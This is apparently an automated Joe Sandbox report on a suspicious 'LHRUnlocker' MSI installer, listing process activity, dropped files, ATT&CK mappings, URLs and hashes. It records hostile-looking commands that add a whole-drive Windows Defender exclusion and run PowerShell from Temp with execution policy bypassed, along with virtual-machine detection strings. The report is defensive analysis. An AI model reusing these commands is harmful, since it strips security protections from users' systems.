Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20220223
Source: C:\Windows\System32\msiexec.exe File created: C:\Users\user\AppData\Local\Temp\MSIEF62.tmp
Source: classification engine Classification label: mal45.evad.winMSI@11/20@0/0
Source: C:\Windows\System32\msiexec.exe File read: C:\Windows\win.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll (reported twice)
Source: LHRUnlocker Install.msi Static file information: TRID: Microsoft Windows Installer (77509/1) 52.18%
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1504:120:WilError_01
Source: C:\Windows\System32\msiexec.exe Automated click: Next >
Source: C:\Windows\System32\msiexec.exe Automated click: Next >
Source: C:\Windows\System32\msiexec.exe Automated click: Install
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: LHRUnlocker Install.msi Static file information: File size 7207424 > 1048576
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00873168 push eax; mov dword ptr [esp], edx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00878B31 push eax; retf
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF513.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF34C.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF280.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF69B.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI3268.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI2874.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIEF62.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF832.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI1FD8.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSIF447.tmpJump to dropped file
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908 Thread sleep count: 2777 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6908 Thread sleep count: 366 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5612 Thread sleep count: 39 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5736 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Last function: Thread delayed
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF513.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF34C.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF280.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Windows\Installer\MSI2874.tmp
Source: C:\Windows\System32\msiexec.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MSIF447.tmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2777
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 366
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\msiexec.exe File Volume queried: C:\ FullSizeInformation
Source: powershell.exe, 00000008.00000002.571424300.000000000545F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.570148293.0000000005001000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V
Source: MSIF69B.tmp.0.dr Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.571424300.000000000545F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.570148293.0000000005001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Cl:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\SysWOW64\msiexec.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\pss341F.ps1" -propFile "C:\Users\user\AppData\Local\Temp\msi3350.txt" -scriptFile "C:\Users\user\AppData\Local\Temp\scr3351.ps1" -scriptArgsFile "C:\Users\user\AppData\Local\Temp\scr3352.txt" -propSep " :<->: " -testPrefix "_testValue."
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command Add-MpPreference -ExclusionPath C:\
Source: C:\Windows\System32\msiexec.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
MITRE ATT&CK Matrix (one line per tactic column; numbers in brackets are the counts shown in the report's matrix for matched techniques)

Initial Access: Replication Through Removable Media [1], Default Accounts, Domain Accounts, Local Accounts, Cloud Accounts, Replication Through Removable Media, External Remote Services
Execution: Command and Scripting Interpreter [1], PowerShell [1], At (Linux), At (Windows), Cron, Launchd, Scheduled Task
Persistence: DLL Side-Loading [1], Boot or Logon Initialization Scripts, Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Privilege Escalation: Process Injection [11], DLL Side-Loading [1], Logon Script (Windows), Logon Script (Mac), Network Logon Script, Rc.common, Startup Items
Defense Evasion: Masquerading [21], Disable or Modify Tools [1], Virtualization/Sandbox Evasion [21], Process Injection [11], Obfuscated Files or Information [1], DLL Side-Loading [1], File Deletion [1]
Credential Access: OS Credential Dumping, LSASS Memory, Security Account Manager, NTDS, LSA Secrets, Cached Domain Credentials, DCSync
Discovery: Security Software Discovery [1], Process Discovery [1], Virtualization/Sandbox Evasion [21], Application Window Discovery [1], Peripheral Device Discovery [11], File and Directory Discovery [1], System Information Discovery [12]
Lateral Movement: Replication Through Removable Media [1], Remote Desktop Protocol, SMB/Windows Admin Shares, Distributed Component Object Model, SSH, VNC, Windows Remote Management
Collection: Archive Collected Data [1], Data from Removable Media, Data from Network Shared Drive, Input Capture, Keylogging, GUI Input Capture, Web Portal Capture
Exfiltration: Exfiltration Over Other Network Medium, Exfiltration Over Bluetooth, Automated Exfiltration, Scheduled Transfer, Data Transfer Size Limits, Exfiltration Over C2 Channel, Exfiltration Over Alternative Protocol
Command and Control: Encrypted Channel [1], Junk Data, Steganography, Protocol Impersonation, Fallback Channels, Multiband Communication, Commonly Used Port
Network Effects: Eavesdrop on Insecure Network Communication, Exploit SS7 to Redirect Phone Calls/SMS, Exploit SS7 to Track Device Location, SIM Card Swap, Manipulate Device Communication, Jamming or Denial of Service, Rogue Wi-Fi Access Points
Remote Service Effects: Remotely Track Device Without Authorization, Remotely Wipe Data Without Authorization, Obtain Device Cloud Backups
Impact: Modify System Partition, Device Lockout, Delete Device Data, Carrier Billing Fraud, Manipulate App Store Rankings or Ratings, Abuse Accessibility Features, Data Encrypted for Impact
Behavior Graph (ID: 577501; Sample: LHRUnlocker Install.msi; Startdate: 23/02/2022; Architecture: WINDOWS; Score: 45)

  • Signatures at start: Sigma detected: Powershell Defender Exclusion; Sigma detected: Change PowerShell Policies to a Unsecure Level; Sigma detected: Suspicious Script Execution From Temp Folder
  • msiexec.exe (started): dropped C:\Windows\Installer\MSI3268.tmp, C:\Windows\Installer\MSI2874.tmp, C:\Windows\Installer\MSI1FD8.tmp (PE32); started two child msiexec.exe processes
  • msiexec.exe (started): dropped C:\Users\user\AppData\Local\...\MSIF832.tmp, C:\Users\user\AppData\Local\...\MSIF69B.tmp, C:\Users\user\AppData\Local\...\MSIF513.tmp (PE32) and 4 other files (none is malicious)
  • msiexec.exe (child): dropped C:\Users\user\AppData\Local\...\scr3351.ps1 and C:\Users\user\AppData\Local\...\pss341F.ps1 (Little-endian); started powershell.exe
  • msiexec.exe (child): Bypasses PowerShell execution policy
  • powershell.exe: Adds a directory exclusion to Windows Defender; started powershell.exe and conhost.exe
Source | Detection | Scanner
LHRUnlocker Install.msi | 0% | Virustotal
LHRUnlocker Install.msi | 0% | Metadefender

Source | Detection | Scanner
C:\Users\user\AppData\Local\Temp\MSIEF62.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIEF62.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF280.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF280.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF34C.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF34C.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF447.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF447.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF513.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF513.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF69B.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF69B.tmp | 0% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MSIF832.tmp | 0% | Metadefender
C:\Users\user\AppData\Local\Temp\MSIF832.tmp | 0% | ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://pesterbdd.com/images/Pester.png00%Avira URL Cloudsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interr0%Avira URL Cloudsafe
https://go.micro0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
No contacted domains info
URLs found in the sample and in process memory:

Name | Source | Malicious | Antivirus Detection | Reputation
https://t.me/LHRUnlockerMSIFASTINSTALLAI_CURRENT_YEAR2022ButtonText_Decline&DeclineAI_PREDEF_LCONDS_ | 3c1a5a.msi.1.dr | false | - | high
http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png0 | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/Pester/Pester0 | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.thawte.com/cps0/ | LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.dr | false | - | high
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://drivers.sergeydev.com/windows/511.65-desktop-win64bit-interr | LHRUnlocker Install.msi, 3c1a5a.msi.1.dr | false | Avira URL Cloud: safe | unknown
https://go.micro | powershell.exe, 00000008.00000003.527476361.00000000057BD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.thawte.com/repository0W | LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.dr | false | - | high
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 00000014.00000002.569907486.0000000005463000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://contoso.com/ | powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp | false | - | high
https://t.me/LHRUnlockerChannelButtonText_Finish&FinishManufacturerSergeyProductCode | 3c1a5a.msi.1.dr | false | - | high
https://contoso.com/License | powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000008.00000002.574716959.0000000005DB6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.advancedinstaller.com | LHRUnlocker Install.msi, MSI2874.tmp.1.dr, 3c1a5a.msi.1.dr, MSIF447.tmp.0.dr, MSIF513.tmp.0.dr, MSIF280.tmp.0.dr, MSIEF62.tmp.0.dr, MSI1FD8.tmp.1.dr, MSIF34C.tmp.0.dr, MSIF69B.tmp.0.dr, MSI3268.tmp.1.dr, MSIF832.tmp.0.dr | false | - | high
http://www.winimage.com/zLibDll | LHRUnlocker Install.msi, 3c1a5a.msi.1.dr | false | - | high
http://www.apache.org/licenses/LICENSE-2.0.html0 | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.569706056.0000000004D51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.569503503.0000000005321000.00000004.00000800.00020000.00000000.sdmp | false | - | high
http://www.winimage.com/zLibDll1.2.7rbr | LHRUnlocker Install.msi, 3c1a5a.msi.1.dr | false | - | high
https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.569890289.0000000004E93000.00000004.00000800.00020000.00000000.sdmp | false | - | high
                                  No contacted IP infos
                                  Joe Sandbox Version:34.0.0 Boulder Opal
                                  Analysis ID:577501
                                  Start date:23.02.2022
                                  Start time:18:48:22
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 9m 19s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:LHRUnlocker Install.msi
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal45.evad.winMSI@11/20@0/0
                                  EGA Information:
                                  • Successful, ratio: 50%
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  • Found application associated with file extension: .msi
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
                                  • Excluded IPs from analysis (whitelisted): 23.211.6.115, 20.54.104.15
                                  • Excluded domains from analysis (whitelisted): client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
                                  • Execution Graph export aborted for target powershell.exe, PID 7036 because it is empty
• Not all processes were analyzed, report is missing behavior information
Time     | Type            | Description
18:50:55 | API Interceptor | 7x Sleep call for process: powershell.exe modified
                                  No context
                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):5829
                                  Entropy (8bit):4.8968676994158
                                  Encrypted:false
                                  SSDEEP:96:WCJ2Woe5o2k6Lm5emmXIGvgyg12jDs+un/iQLEYFjDaeWJ6KGcmXx9smyFRLcU6f:5xoe5oVsm5emd0gkjDt4iWN3yBGHh9s6
                                  MD5:36DE9155D6C265A1DE62A448F3B5B66E
                                  SHA1:02D21946CBDD01860A0DE38D7EEC6CDE3A964FC3
                                  SHA-256:8BA38D55AA8F1E4F959E7223FDF653ABB9BE5B8B5DE9D116604E1ABB371C1C87
                                  SHA-512:C734ADE161FB89472B1DF9B9F062F4A53E7010D3FF99EDC0BD564540A56BC35743625C50A00635C31D165A74DCDBB330FFB878C5919D7B267F6F33D2AAB328E7
                                  Malicious:false
                                  Reputation:moderate, very likely benign file
                                  Preview:PSMODULECACHE......<.e...Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........<.e...T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
                                  SHA-512:47BA474912D8530FC78FD2C61572A3C9E91A27B1BDFAB08869A550AE0452298B3FF63A06B607BECA9D8DF56BCCC19B9720F5E1EC59EA5F3FD0F85C9762058FB9
                                  Malicious:false
                                  Antivirus:
                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                  • Antivirus: ReversingLabs, Detection: 0%
                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........0..c..c..c"..b..c"..bV.c...b..c...b..c...b..c"..b..c"..b..c"..b..c..c..cH..b..cH..b..cH.Sc..c..;c..cH..b..cRich..c........PE..L...G..a.........."!.........&............... ...............................`............@.........................@...................0............"..........\B...S..p...................@U......HT..@............ ..$............................text............................... ..`.rdata....... ......................@..@.data...............................@....rsrc...0...........................@..@.reloc..\B.......D..................@..B........................................................................................................................................................................................................................................................................................
                                  Process:C:\Windows\System32\msiexec.exe
                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):408544
                                  Entropy (8bit):6.410598211463919
                                  Encrypted:false
                                  SSDEEP:6144:FwznG9uw/r8fyHQMNvrPGtPu4AO9k9ZeWYhEIho7bZQ:SG9TAVMlSn30Z0EIhgbZQ
                                  MD5:5D25243E90673C44AC420D69676F9062
                                  SHA1:23234013562F7EF738DB615246D391B8E191B475
                                  SHA-256:0DDB820918F3918496E414617536226AF08E27A7F13E5A58444F8DCF297A65D5
